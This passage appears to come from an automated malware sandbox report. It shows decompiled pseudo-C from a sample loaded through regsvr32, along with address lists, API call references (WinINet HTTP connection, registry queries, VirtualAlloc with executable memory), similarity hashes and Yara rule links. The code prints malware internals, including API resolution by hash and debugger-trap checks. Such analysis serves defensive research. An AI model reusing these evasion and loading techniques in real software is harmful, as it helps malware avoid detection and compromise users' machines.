								} else {
									_t240 =  *(_t249 + 0x10);
									__eflags = _t240;
									if(_t240 == 0) {
										L27:
										_t160 = 1;
									} else {
										__eflags = _t240 - 0xffffffff;
										if(_t240 == 0xffffffff) {
											goto L27;
										} else {
											_t160 = _t244;
										}
									}
									__eflags = _t160;
									if(_t160 != 0) {
										goto L31;
									} else {
										_t161 = E004715C0(0xd27f045a, 0xdda3415f);
										__eflags = _t161;
										if(_t161 == 0) {
											goto L31;
										} else {
											_push(_t240);
											asm("int3");
											return _t161;
										}
									}
								}
							}
						}
					} else {
						_t241 =  *(_t249 + 8);
						if(_t241 == 0 || _t241 == 0xffffffff) {
							_t166 = 1;
						} else {
							_t166 = _t244;
						}
						if(_t166 != 0) {
							goto L14;
						} else {
							_t167 = E004715C0(0xd27f045a, 0xdda3415f);
							if(_t167 == 0) {
								goto L14;
							} else {
								_push(_t241);
								asm("int3");
								return _t167;
							}
						}
					}
				}
			}

0x00493374
0x00493377
0x0049337d
0x0049337f
0x00493389
0x00493394
0x0049339f
0x004933aa
0x004933b4
0x004933b9
0x004933c2
0x004933cf
0x004933dc
0x004933eb
0x004933fa
0x00493407
0x00493410
0x00493419
0x00493429
0x0049342b
0x0049343f
0x00493449
0x00493454
0x00493459
0x0049345b
0x0049345b
0x0049344b
0x0049344b
0x0049344b
0x00493449
0x00493475
0x004937cf
0x004937d3
0x00493804
0x00493804
0x00493808
0x00000000
0x004937d5
0x004937d5
0x004937d8
0x004937da
0x004937e5
0x004937e5
0x004937dc
0x004937dc
0x004937df
0x00000000
0x004937e1
0x004937e1
0x004937e1
0x004937df
0x004937ea
0x004937ec
0x00000000
0x004937ee
0x004937f8
0x004937fd
0x004937ff
0x00000000
0x00493801
0x00493801
0x00493802
0x00493803
0x00493803
0x004937ff
0x004937ec
0x0049347b
0x00493486
0x0049348c
0x0049348e
0x00493494
0x004934c5
0x004934c5
0x004934c9
0x004934cc
0x004934ce
0x004934d9
0x004934d9
0x004934d0
0x004934d0
0x004934d3
0x00000000
0x004934d5
0x004934d5
0x004934d5
0x004934d3
0x004934de
0x004934e0
0x004936e0
0x004936e7
0x004936f0
0x004936f9
0x00493702
0x0049370b
0x00493714
0x00493719
0x00493722
0x004934e6
0x004934e6
0x004934ea
0x004934f6
0x004934ec
0x004934ec
0x004934ec
0x00493508
0x0049350f
0x00493511
0x00493788
0x0049378c
0x004937bd
0x004937bd
0x004937c1
0x004937c3
0x00000000
0x0049378e
0x0049378e
0x00493791
0x00493793
0x0049379e
0x0049379e
0x00493795
0x00493795
0x00493798
0x00000000
0x0049379a
0x0049379a
0x0049379a
0x00493798
0x004937a3
0x004937a5
0x00000000
0x004937a7
0x004937b1
0x004937b6
0x004937b8
0x00000000
0x004937ba
0x004937ba
0x004937bb
0x004937bc
0x004937bc
0x004937b8
0x004937a5
0x00493517
0x00493517
0x0049351a
0x00493524
0x0049352e
0x00493544
0x00493546
0x00493548
0x0049354c
0x0049357d
0x0049357d
0x00493584
0x00493588
0x0049358d
0x00493590
0x00493592
0x0049359d
0x0049359d
0x00493594
0x00493594
0x00493597
0x00000000
0x00493599
0x00493599
0x00493599
0x00493597
0x004935a2
0x004935a4
0x00493743
0x0049374a
0x00493753
0x0049375c
0x00493765
0x0049376e
0x00493777
0x0049377c
0x00493785
0x004935aa
0x004935aa
0x004935af
0x004935b4
0x004935be
0x004935c3
0x004935c8
0x004935c8
0x004935cc
0x00000000
0x00000000
0x004935d2
0x004935d3
0x004935d9
0x00000000
0x00000000
0x004935db
0x004935df
0x00000000
0x004935df
0x00493727
0x0049372a
0x0049372f
0x00493735
0x00000000
0x00493735
0x004935e4
0x004935e4
0x004935e7
0x004935e9
0x004935f1
0x00493604
0x00493606
0x00493608
0x00493616
0x00493616
0x00493627
0x00493629
0x0049362b
0x00493639
0x00493639
0x0049362b
0x0049363b
0x00493652
0x00493654
0x00493656
0x00493667
0x00493667
0x00493669
0x00493680
0x00493682
0x00493684
0x00493694
0x00493694
0x0049369a
0x004936a3
0x004936ac
0x004936b5
0x004936be
0x004936c7
0x004936d8
0x004936d8
0x0049354e
0x0049354e
0x00493551
0x00493553
0x0049355e
0x0049355e
0x00493555
0x00493555
0x00493558
0x00000000
0x0049355a
0x0049355a
0x0049355a
0x00493558
0x00493563
0x00493565
0x00000000
0x00493567
0x00493571
0x00493576
0x00493578
0x00000000
0x0049357a
0x0049357a
0x0049357b
0x0049357c
0x0049357c
0x00493578
0x00493565
0x0049354c
0x00493511
0x00493496
0x00493496
0x0049349b
0x004934a6
0x004934a2
0x004934a2
0x004934a2
0x004934ad
0x00000000
0x004934af
0x004934b9
0x004934c0
0x00000000
0x004934c2
0x004934c2
0x004934c3
0x004934c4
0x004934c4
0x004934c0
0x004934ad
0x00493494

APIs

InternetConnectW.WININET(00CC0004,?,00000000,00000000,00000000,00000003,00000000,00000000,D27F045A,0E214CDE,?,00000000,?,00000000,00000000,00000000), ref: 0049348C
HttpOpenRequestW.WININET(A1310F65,?,?,00000000,00000000,00000000,?,00000000,?,0049AA40,A1310F65,D27F045A,8813E141), ref: 00493544

Part of subcall function 004710E0: __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00471124

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: ConnectHttpInternetOpenRequestUnothrow_t@std@@@__ehfuncinfo$??2@
String ID:
API String ID: 3503947753-0
Opcode ID: ad391aa21f3787ab0cc99061bde217758f25223bfc2601bf037543cd9a4abb64
Instruction ID: d58697715ebf8d1f29891180469e44b7243bfa9780f4f160ed8f78402cd05558
Opcode Fuzzy Hash: ad391aa21f3787ab0cc99061bde217758f25223bfc2601bf037543cd9a4abb64
Instruction Fuzzy Hash: 9FC10530214301ABDB11EF65CC85BAFBBE4AF91358F10883EF455462A1EB78DE49C75A

Uniqueness

Uniqueness Score: -1.00%

Function 0048CAE0, Relevance: 3.2, APIs: 2, Instructions: 207
registryCOMMON

Download Yara Rule

C-Code - Quality: 91%

			E0048CAE0(void* __ecx) {
				void* __esi;
				intOrPtr _t49;
				int* _t50;
				void* _t52;
				void* _t62;
				int _t99;
				intOrPtr* _t100;
				void* _t101;
				signed short* _t102;
				void* _t129;
				char* _t139;
				void* _t143;
				intOrPtr* _t144;
				intOrPtr* _t146;

				_t143 = __ecx;
				_push(0);
				E00489350(_t146 + 0x14);
				_t49 =  *((intOrPtr*)(__ecx + 4));
				if(_t49 == 0 || _t49 == 0xffffffff) {
					_t50 = 1;
				} else {
					_t50 = 0;
				}
				if(_t50 != 0) {
					L11:
					_t99 = 0;
				} else {
					_t139 =  *((intOrPtr*)(_t146 + 0x44));
					if(_t139 == 0 ||  *_t139 != 0) {
						_t129 = _t146 + 8;
						 *((intOrPtr*)(_t129 + 0x18)) = 0;
						 *((intOrPtr*)(_t129 + 0x1c)) = 0;
						E004787A0(_t129);
						if(E004715C0(0x3ab94787, 0x7c5744d4) != 0) {
							RegQueryValueExW( *(_t143 + 4),  *(_t146 + 0x18), 0, _t146 + 0x20, 0, _t146 + 0x24); // executed
						}
						_t89 =  *(_t146 + 0x24);
						if( *(_t146 + 0x24) != 0) {
							E00489670(_t146 + 0x14, _t89);
							if(E004715C0(0x3ab94787, 0x7c5744d4) != 0) {
								_t142 =  *(_t143 + 4);
								RegQueryValueExW( *(_t143 + 4),  *(_t146 + 8), 0, _t146 + 0x20, E00489640(_t146 + 0x14, 0), _t146 + 0x24); // executed
							}
							_t99 =  *(_t146 + 0x20);
							E00478CA0(_t146 + 8);
						} else {
							E00478CA0(_t146 + 8);
							goto L11;
						}
					} else {
						goto L11;
					}
				}
				if(_t99 == 2) {
					_t100 = E004715C0(0xa1310f65, 0x6ad451b6);
					if(_t100 != 0) {
						_t52 = E00489640(_t146 + 0x14, 0);
						 *_t100(_t52, 0, 0);
						_t101 = 0;
					} else {
						_t101 = 0;
					}
					E00478810(_t146, _t101);
					_t144 = E004715C0(0xa1310f65, 0x6ad451b6);
					if(_t144 != 0) {
						_t62 = E00489640(_t146 + 0x14, 0);
						 *_t144(_t62,  *((intOrPtr*)(_t146 + 4)), _t101);
					}
					E004788C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
					E00478CA0(_t146);
					E00489510(_t146 + 0x10);
					return  *((intOrPtr*)(_t146 + 0x40));
				} else {
					if(_t99 != 7) {
						if(_t99 != 1) {
							E00478810( *((intOrPtr*)(_t146 + 0x44)), 0);
							E00489510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						} else {
							E00478AB0( *((intOrPtr*)(_t146 + 0x48)), E00489640(_t146 + 0x14, 0), 0);
							E00489510(_t146 + 0x10);
							return  *((intOrPtr*)(_t146 + 0x40));
						}
					} else {
						E00478810(_t146 + 4, 0);
						_t102 = E00489640(_t146 + 0x14, 0);
						while(( *_t102 & 0x0000ffff) != 0) {
							if(E00480180( *_t146, 0x7fffffff, _t142) != 0) {
								E004796D0(_t146 + 4, 0xa);
							}
							E00478AB0(_t146 + 0x30, _t102, 0);
							E00480220(_t146 + 8,  *((intOrPtr*)(_t146 + 0x2c)), 0);
							_t102 = _t102 + 2 + E00480180( *((intOrPtr*)(_t146 + 0x28)), 0x7fffffff, _t142) * 2;
							E00478CA0(_t146 + 0x28);
						}
						E004788C0( *((intOrPtr*)(_t146 + 0x44)), _t146);
						E00478CA0(_t146);
						E00489510(_t146 + 0x10);
						return  *((intOrPtr*)(_t146 + 0x40));
					}
				}
			}

0x0048cae6
0x0048cae8
0x0048caee
0x0048caf3
0x0048caf8
0x0048cb03
0x0048caff
0x0048caff
0x0048caff
0x0048cb0a
0x0048cb6b
0x0048cb6b
0x0048cb0c
0x0048cb0c
0x0048cb12
0x0048cb1b
0x0048cb1f
0x0048cb22
0x0048cb25
0x0048cb3d
0x0048cb54
0x0048cb54
0x0048cb56
0x0048cb5c
0x0048cd05
0x0048cd1d
0x0048cd1f
0x0048cd42
0x0048cd42
0x0048cd44
0x0048cd4c
0x0048cb62
0x0048cb66
0x00000000
0x0048cb66
0x00000000
0x00000000
0x00000000
0x0048cb12
0x0048cb70
0x0048cc84
0x0048cc88
0x0048cc94
0x0048cca0
0x0048cca2
0x0048cc8a
0x0048cc8a
0x0048cc8a
0x0048cca8
0x0048ccbc
0x0048ccc0
0x0048ccc8
0x0048ccd3
0x0048ccd3
0x0048ccdd
0x0048cce5
0x0048ccee
0x0048ccfd
0x0048cb76
0x0048cb79
0x0048cc25
0x0048cc5a
0x0048cc63
0x0048cc72
0x0048cc27
0x0048cc39
0x0048cc42
0x0048cc51
0x0048cc51
0x0048cb7f
0x0048cb85
0x0048cb95
0x0048cb9c
0x0048cbad
0x0048cbb5
0x0048cbb5
0x0048cbc1
0x0048cbd0
0x0048cbe7
0x0048cbeb
0x0048cbf3
0x0048cbff
0x0048cc07
0x0048cc10
0x0048cc1f
0x0048cc1f
0x0048cb79

APIs

RegQueryValueExW.KERNEL32(?,?,00000000,?,00000000,?,3AB94787,7C5744D4,00000000), ref: 0048CB54

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction ID: 8d5f3cffd4cfc7f62c743abe32a450f39d7cfd2ab2353aa410a43240900f8a2d
Opcode Fuzzy Hash: 1a993fb9358f32fd43622a429a7ad0c6ffa3ee027b8f9921b25b7e9b31177733
Instruction Fuzzy Hash: 09616030244201AAD715FF65DCC2FBFB3E8AF94748F044D2EB54A96191EE25ED08C76A

Uniqueness

Uniqueness Score: -1.00%

Function 0048C790, Relevance: 3.1, APIs: 2, Instructions: 85
registryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E0048C790(void* __ecx, void* __edx) {
				intOrPtr _t21;
				int* _t22;
				char* _t47;
				void* _t50;
				void* _t53;

				 *((intOrPtr*)(_t53 + 0x18)) = 0;
				_t50 = __ecx;
				_push(0);
				E00489350(_t53 + 4);
				_t21 =  *((intOrPtr*)(__ecx + 4));
				if(_t21 == 0 || _t21 == 0xffffffff) {
					_t22 = 1;
				} else {
					_t22 = 0;
				}
				if(_t22 != 0) {
					L10:
					E00489510(_t53);
					return  *((intOrPtr*)(_t53 + 0x18));
				} else {
					_t47 =  *(_t53 + 0x2c);
					if(_t47 == 0 ||  *_t47 != 0) {
						 *(_t53 + 0x10) = 0;
						 *(_t53 + 0x14) = 0;
						if(E004715C0(0x3ab94787, 0x8883f185) != 0) {
							RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, 0, _t53 + 0x14); // executed
						}
						_t26 =  *(_t53 + 0x14);
						if( *(_t53 + 0x14) != 0) {
							E00489670(_t53 + 4, _t26);
							if(E004715C0(0x3ab94787, 0x8883f185) != 0) {
								RegQueryValueExA( *(_t50 + 4), _t47, 0, _t53 + 0x10, E00489640(_t53 + 4, 0), _t53 + 0x14); // executed
							}
							if( *(_t53 + 0x10) == 4) {
								E004897D0(_t53 + 8, _t53 + 0x18, 4);
							}
						}
					}
					goto L10;
				}
			}

0x0048c798
0x0048c79c
0x0048c79e
0x0048c7a3
0x0048c7a8
0x0048c7ad
0x0048c7b8
0x0048c7b4
0x0048c7b4
0x0048c7b4
0x0048c7bf
0x0048c805
0x0048c80c
0x0048c819
0x0048c7c1
0x0048c7c1
0x0048c7c7
0x0048c7ce
0x0048c7d2
0x0048c7e9
0x0048c7fb
0x0048c7fb
0x0048c7fd
0x0048c803
0x0048c821
0x0048c839
0x0048c85a
0x0048c85a
0x0048c861
0x0048c86e
0x0048c86e
0x0048c861
0x0048c803
0x00000000
0x0048c7c7

APIs

RegQueryValueExA.KERNEL32(?,?,00000000,?,00000000,?,8883F185,00000000), ref: 0048C7FB
RegQueryValueExA.KERNEL32(?,?,00000000,8883F185,00000000,00000000,00000000,8883F185,?,8883F185,00000000), ref: 0048C85A

Memory Dump Source

Source File: 00000004.00000002.2382349580.0000000000460000.00000040.00000001.sdmp, Offset: 00460000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_460000_regsvr32.jbxd

Similarity

API ID: QueryValue
String ID:
API String ID: 3660427363-0
Opcode ID: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction ID: bd4e2424d2cb2fc6f5c2619efdfb77a6f8b8864cdeabae71492ad24287bd290d
Opcode Fuzzy Hash: 1b4fde19d6e27f85aaca9c95f26fbe1a7904d47f24c8b1bb7409f34fb5227349
Instruction Fuzzy Hash: 34216031204217AAD715FE25CC85AAF77989F94B14F040D2FF44696251E734DD09CBFA

Uniqueness

Uniqueness Score: -1.00%

Function 001FB1B0, Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040), ref: 001FB234

Strings

VirtualAlloc, xrefs: 001FB219, 001FB21C

Memory Dump Source

Source File: 00000004.00000002.2382019410.00000000001C0000.00000040.00000001.sdmp, Offset: 001C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_4_2_1c0000_regsvr32.jbxd

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction ID: 00f7bf273c12181d753f7cfc3d672da082df0c3bd322063f474bf9865822f8e8
Opcode Fuzzy Hash: 28e58905486cc54ceb0c66d9f59e735f8340f5baddf7968a63ebffb8cdc22c52
Instruction Fuzzy Hash: F01130A0D0828DDEEB01D7E8C449BFEBFB55F25704F044098D6486A282D7BA575887A6

Uniqueness

Uniqueness Score: -1.00%

Function 004747B0, Relevance: 2.1, APIs: 1, Instructions: 618
COMMON

Download Yara Rule

C-Code - Quality: 74%

			E004747B0(void* __ebx, intOrPtr __edi, intOrPtr __esi) {
				void* _t93;
				long _t99;
				void* _t109;
				void* _t110;
				intOrPtr _t118;
				char _t133;
				intOrPtr _t141;
				void* _t144;
				void* _t149;
				intOrPtr _t150;
				intOrPtr _t155;
				void* _t158;
				void* _t161;
				intOrPtr _t163;
				void* _t166;
				void* _t169;
				int _t174;
				intOrPtr _t179;
				void* _t182;
				void* _t185;
				void* _t194;
				void* _t196;
				void* _t198;
				void* _t199;
				void* _t202;
				void* _t203;
				intOrPtr* _t205;
				void* _t206;
				long _t207;
				void* _t209;
				void* _t213;
				void* _t214;
				void* _t233;
				void* _t235;
				void* _t236;
				void* _t237;
				void* _t238;
				void* _t239;
				void* _t242;
				void* _t243;
				void* _t245;
				long _t246;
				intOrPtr* _t248;
				long _t249;
				long _t250;
				long _t253;
				long _t255;
				long _t258;
				long _t259;
				long _t261;
				intOrPtr _t266;
				long _t267;
				intOrPtr _t270;
				intOrPtr _t272;
				intOrPtr* _t273;
				intOrPtr* _t277;
				intOrPtr* _t278;
				void* _t281;
				signed int _t283;
				void* _t284;
				void* _t285;

				_t272 = __esi;
				_t270 = __edi;
				_t285 = _t284 - 0x38;
				_t246 =  *0x49b1f4; // 0x26b1568
				 *(_t285 + 0x34) = 0;
				if(_t246 == 0xc139578) {
					 *0x49b1f4 = 0;
					goto L6;
				} else {
					if(_t246 == 0) {
						L6:
						_push(0x3ab94787);
						_t196 = E00477564(0x3ab94787);
						if(_t196 == 0) {
							if(E00476C50(0x3ab94787) != 0) {
								_push(0x3ab94787);
								_t196 = E00477564(0x3ab94787);
							}
						}
						if(_t196 == 0) {
							goto L25;
						} else {
							_t285 = _t285 + 0xfffffff8;
							_t248 = E004767C8(_t196, 0xc17c5a6e);
							goto L9;
						}
					} else {
						do {
							_t245 = 0;
							_t194 = 0;
							while( *((intOrPtr*)(_t194 + _t246 + 8)) != 0xc17c5a6e) {
								_t245 = _t245 + 1;
								_t194 = _t194 + 0x18;
								if(_t245 < 0x10) {
									continue;
								} else {
									goto L5;
								}
								goto L186;
							}
							_t248 =  *((intOrPtr*)(_t194 + _t246 + 0x14));
							if(_t248 != 0) {
								L9:
								if(_t248 == 0) {
									L25:
									return 0;
								} else {
									_push(_t285 + 0x34);
									_push(8);
									_push(0xffffffff);
									if( *_t248() == 0) {
										_t93 = E00477BF0(0xea5f6acc, _t272, 0xea5f6acc);
										if(_t93 != 0) {
											L174:
											if(_t93 == 0) {
												goto L178;
											} else {
												asm("int3");
												return _t93;
											}
										} else {
											_push(0xa1310f65);
											_t214 = E00477564(0xa1310f65);
											if(_t214 == 0) {
												if(E00476C50(0xa1310f65) != 0) {
													_push(0xa1310f65);
													_t214 = E00477564(0xa1310f65);
												}
											}
											if(_t214 == 0) {
												L178:
												if(0 != 0) {
													goto L25;
												} else {
													goto L11;
												}
											} else {
												_t285 = _t285 + 0xfffffff8;
												_t93 = E004767C8(_t214, 0xea5f6acc);
												goto L174;
											}
										}
									} else {
										L11:
										_t249 =  *0x49b1f4; // 0x26b1568
										 *(_t285 + 0x28) =  *(_t285 + 0x34);
										 *((char*)(_t285 + 0x2c)) = 1;
										 *(_t285 + 0x30) = 0;
										if(_t249 == 0xc139578) {
											 *0x49b1f4 = 0;
											goto L17;
										} else {
											if(_t249 == 0) {
												L17:
												_push(0x3ab94787);
												_t198 = E00477564(0x3ab94787);
												if(_t198 == 0) {
													if(E00476C50(0x3ab94787) != 0) {
														_push(0x3ab94787);
														_t198 = E00477564(0x3ab94787);
													}
												}
												if(_t198 == 0) {
													goto L22;
												} else {
													_t285 = _t285 + 0xfffffff8;
													_t266 = E004767C8(_t198, 0x2eeff4c6);
													goto L20;
												}
											} else {
												do {
													_t243 = 0;
													_t185 = 0;
													while( *((intOrPtr*)(_t185 + _t249 + 8)) != 0x2eeff4c6) {
														_t243 = _t243 + 1;
														_t185 = _t185 + 0x18;
														if(_t243 < 0x10) {
															continue;
														} else {
															goto L16;
														}
														goto L186;
													}
													_t266 =  *((intOrPtr*)(_t185 + _t249 + 0x14));
													if(_t266 != 0) {
														L20:
														if(_t266 == 0) {
															L22:
															_t99 =  *(_t285 + 0x30);
															if(_t99 != 0) {
																_push(_t99);
																E00489350(_t285 + 4);
																_t250 =  *0x49b1f4; // 0x26b1568
																if(_t250 == 0xc139578) {
																	 *0x49b1f4 = 0;
																	goto L32;
																} else {
																	if(_t250 == 0) {
																		L32:
																		_push(0x3ab94787);
																		_t199 = E00477564(0x3ab94787);
																		if(_t199 == 0) {
																			if(E00476C50(0x3ab94787) != 0) {
																				_push(0x3ab94787);
																				_t199 = E00477564(0x3ab94787);
																			}
																		}
																		if(_t199 == 0) {
																			goto L36;
																		} else {
																			_t285 = _t285 + 0xfffffff8;
																			_t277 = E004767C8(_t199, 0x2eeff4c6);
																			goto L35;
																		}
																	} else {
																		do {
																			_t239 = 0;
																			_t169 = 0;
																			while( *((intOrPtr*)(_t169 + _t250 + 8)) != 0x2eeff4c6) {
																				_t239 = _t239 + 1;
																				_t169 = _t169 + 0x18;
																				if(_t239 < 0x10) {
																					continue;
																				} else {
																					goto L31;
																				}
																				goto L186;
																			}
																			_t277 =  *((intOrPtr*)(_t169 + _t250 + 0x14));
																			if(_t277 != 0) {
																				L35:
																				if(_t277 != 0) {
																					_t109 = E00489640(_t285 + 4, 0);
																					_t110 = E00489650(_t285);
																					_push(_t285 + 0x30);
																					_push(_t110);
																					_push(_t109);
																					_push(2);
																					_push( *(_t285 + 0x44));
																					if( *_t277() == 0) {
																						_t253 =  *0x49b1f4; // 0x26b1568
																						if(_t253 == 0xc139578) {
																							 *0x49b1f4 = 0;
																							goto L131;
																						} else {
																							if(_t253 == 0) {
																								L131:
																								_push(0xa1310f65);
																								_t202 = E00477564(0xa1310f65);
																								if(_t202 == 0) {
																									if(E00476C50(0xa1310f65) != 0) {
																										_push(0xa1310f65);
																										_t202 = E00477564(0xa1310f65);
																									}
																								}
																								if(_t202 == 0) {
																									goto L138;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t163 = E004767C8(_t202, 0xea5f6acc);
																									goto L134;
																								}
																							} else {
																								do {
																									_t238 = 0;
																									_t166 = 0;
																									while( *((intOrPtr*)(_t166 + _t253 + 8)) != 0xea5f6acc) {
																										_t238 = _t238 + 1;
																										_t166 = _t166 + 0x18;
																										if(_t238 < 0x10) {
																											continue;
																										} else {
																											goto L130;
																										}
																										goto L186;
																									}
																									_t163 =  *((intOrPtr*)(_t166 + _t253 + 0x14));
																									if(_t163 != 0) {
																										L134:
																										if(_t163 == 0) {
																											L138:
																											if(0 != 0) {
																												goto L36;
																											} else {
																												goto L40;
																											}
																										} else {
																											asm("int3");
																											return _t163;
																										}
																									} else {
																										goto L131;
																									}
																									goto L186;
																									L130:
																									asm("o16 nop [eax+eax]");
																									_t70 = _t253 + 0x180; // 0x26d90a8
																									_t253 =  *_t70;
																								} while (_t253 != 0);
																								goto L131;
																							}
																						}
																					} else {
																						L40:
																						_t278 = E00489640(_t285 + 4, 0);
																						_t118 =  *0x49a148; // 0x0
																						 *((short*)(_t285 + 0x14)) =  *0x49a14c & 0x0000ffff;
																						_t255 =  *0x49b1f4; // 0x26b1568
																						 *(_t285 + 0x24) = 0;
																						 *((intOrPtr*)(_t285 + 0x10)) = _t118;
																						if(_t255 == 0xc139578) {
																							 *0x49b1f4 = 0;
																							goto L46;
																						} else {
																							if(_t255 == 0) {
																								L46:
																								_push(0x3ab94787);
																								_t203 = E00477564(0x3ab94787);
																								if(_t203 == 0) {
																									if(E00476C50(0x3ab94787) != 0) {
																										_push(0x3ab94787);
																										_t203 = E00477564(0x3ab94787);
																									}
																								}
																								if(_t203 == 0) {
																									goto L87;
																								} else {
																									_t285 = _t285 + 0xfffffff8;
																									_t205 = E004767C8(_t203, 0xff8924ad);
																									goto L49;
																								}
																							} else {
																								do {
																									_t237 = 0;
																									_t161 = 0;
																									while( *((intOrPtr*)(_t161 + _t255 + 8)) != 0xff8924ad) {
																										_t237 = _t237 + 1;
																										_t161 = _t161 + 0x18;
																										if(_t237 < 0x10) {
																											continue;
																										} else {
																											goto L45;
																										}
																										goto L186;
																									}
																									_t205 =  *((intOrPtr*)(_t161 + _t255 + 0x14));
																									if(_t205 != 0) {
																										L49:
																										if(_t205 == 0) {
																											L87:
																											E00489510(_t285);
																											if( *((char*)(_t285 + 0x2c)) != 0) {
																												E0048BE30(_t285 + 0x28, _t272);
																											}
																											return 0;
																										} else {
																											_push(_t285 + 0x24);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0);
																											_push(0x220);
																											_push(0x20);
																											_push(2);
																											_push(_t285 + 0x10);
																											if( *_t205() == 0) {
																												_t258 =  *0x49b1f4; // 0x26b1568
																												if(_t258 == 0xc139578) {
																													 *0x49b1f4 = 0;
																													goto L107;
																												} else {
																													if(_t258 == 0) {
																														L107:
																														_push(0xa1310f65);
																														_t206 = E00477564(0xa1310f65);
																														if(_t206 == 0) {
																															if(E00476C50(0xa1310f65) != 0) {
																																_push(0xa1310f65);
																																_t206 = E00477564(0xa1310f65);
																															}
																														}
																														if(_t206 == 0) {
																															goto L114;
																														} else {
																															_t285 = _t285 + 0xfffffff8;
																															_t155 = E004767C8(_t206, 0xea5f6acc);
																															goto L110;
																														}
																													} else {
																														do {
																															_t236 = 0;
																															_t158 = 0;
																															while( *((intOrPtr*)(_t158 + _t258 + 8)) != 0xea5f6acc) {
																																_t236 = _t236 + 1;
																																_t158 = _t158 + 0x18;
																																if(_t236 < 0x10) {
																																	continue;
																																} else {
																																	goto L106;
																																}
																																goto L186;
																															}
																															_t155 =  *((intOrPtr*)(_t158 + _t258 + 0x14));
																															if(_t155 != 0) {
																																L110:
																																if(_t155 == 0) {
																																	L114:
																																	if(0 != 0) {
																																		goto L87;
																																	} else {
																																		goto L51;
																																	}
																																} else {
																																	asm("int3");
																																	return _t155;
																																}
																															} else {
																																goto L107;
																															}
																															goto L186;
																															L106:
																															asm("o16 nop [eax+eax]");
																															_t63 = _t258 + 0x180; // 0x26d90a8
																															_t258 =  *_t63;
																														} while (_t258 != 0);
																														goto L107;
																													}
																												}
																											} else {
																												L51:
																												_t207 =  *(_t285 + 0x24);
																												if( *_t278 <= 0) {
																													L67:
																													if(_t207 == 0 || _t207 == 0xffffffff) {
																														_t133 = 1;
																													} else {
																														_t133 = 0;
																													}
																													if(_t133 != 0) {
																														L84:
																														E00489510(_t285);
																														if( *((char*)(_t285 + 0x2c)) != 0) {
																															E0048BE30(_t285 + 0x28, _t272);
																														}
																														return 0;
																													} else {
																														_t259 =  *0x49b1f4; // 0x26b1568
																														if(_t259 == 0xc139578) {
																															 *0x49b1f4 = 0;
																															goto L79;
																														} else {
																															if(_t259 == 0) {
																																L79:
																																_push(0x3ab94787);
																																_t281 = E00477564(0x3ab94787);
																																if(_t281 == 0) {
																																	if(E00476C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t281 = E00477564(0x3ab94787);
																																	}
																																}
																																if(_t281 == 0) {
																																	goto L84;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t141 = E004767C8(_t281, 0x9d775c6);
																																	goto L82;
																																}
																															} else {
																																do {
																																	_t233 = 0;
																																	_t144 = 0;
																																	while( *((intOrPtr*)(_t144 + _t259 + 8)) != 0x9d775c6) {
																																		_t233 = _t233 + 1;
																																		_t144 = _t144 + 0x18;
																																		if(_t233 < 0x10) {
																																			continue;
																																		} else {
																																			goto L78;
																																		}
																																		goto L186;
																																	}
																																	_t141 =  *((intOrPtr*)(_t144 + _t259 + 0x14));
																																	if(_t141 != 0) {
																																		L82:
																																		if(_t141 == 0) {
																																			goto L84;
																																		} else {
																																			_push(_t207);
																																			asm("int3");
																																			return _t141;
																																		}
																																	} else {
																																		goto L79;
																																	}
																																	goto L186;
																																	L78:
																																	asm("o16 nop [eax+eax]");
																																	_t52 = _t259 + 0x180; // 0x26d90a8
																																	_t259 =  *_t52;
																																} while (_t259 != 0);
																																goto L79;
																															}
																														}
																													}
																												} else {
																													 *(_t285 + 0x18) = _t207;
																													 *((intOrPtr*)(_t285 + 0x1c)) = _t272;
																													_t273 = _t278;
																													 *((intOrPtr*)(_t285 + 0x20)) = _t270;
																													_t283 = 0;
																													do {
																														_t261 =  *0x49b1f4; // 0x26b1568
																														if(_t261 == 0xc139578) {
																															 *0x49b1f4 = 0;
																															goto L60;
																														} else {
																															if(_t261 == 0) {
																																L60:
																																_push(0x3ab94787);
																																_t209 = E00477564(0x3ab94787);
																																if(_t209 == 0) {
																																	if(E00476C50(0x3ab94787) != 0) {
																																		_push(0x3ab94787);
																																		_t209 = E00477564(0x3ab94787);
																																	}
																																}
																																if(_t209 == 0) {
																																	goto L65;
																																} else {
																																	_t285 = _t285 + 0xfffffff8;
																																	_t150 = E004767C8(_t209, 0x68adfb76);
																																	goto L63;
																																}
																															} else {
																																do {
																																	_t235 = 0;
																																	_t149 = 0;
																																	while( *((intOrPtr*)(_t149 + _t261 + 8)) != 0x68adfb76) {
																																		_t235 = _t235 + 1;
																																		_t149 = _t149 + 0x18;
																																		if(_t235 < 0x10) {
																																			continue;
																																		} else {
																																			goto L59;
																																		}
																																		goto L186;
																																	}
																																	_t150 =  *((intOrPtr*)(_t149 + _t261 + 0x14));
																																	if(_t150 != 0) {
																																		L63:
																																		if(_t150 == 0) {
																																			goto L65;
																																		} else {
																																			_push( *((intOrPtr*)(_t273 + 4 + _t283 * 8)));
